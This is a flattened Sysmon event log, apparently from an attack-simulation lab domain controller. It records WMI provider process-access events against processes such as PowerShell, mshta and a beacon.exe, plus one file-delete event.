10341000x80000000000000002246485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1DA2F9D197827A94D12DEE12CE1A181,SHA256=6039B90B2FAD9C1D60584B0C508F5BACE4EC36FBB40B11D929F2FFD73F6AFD91,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 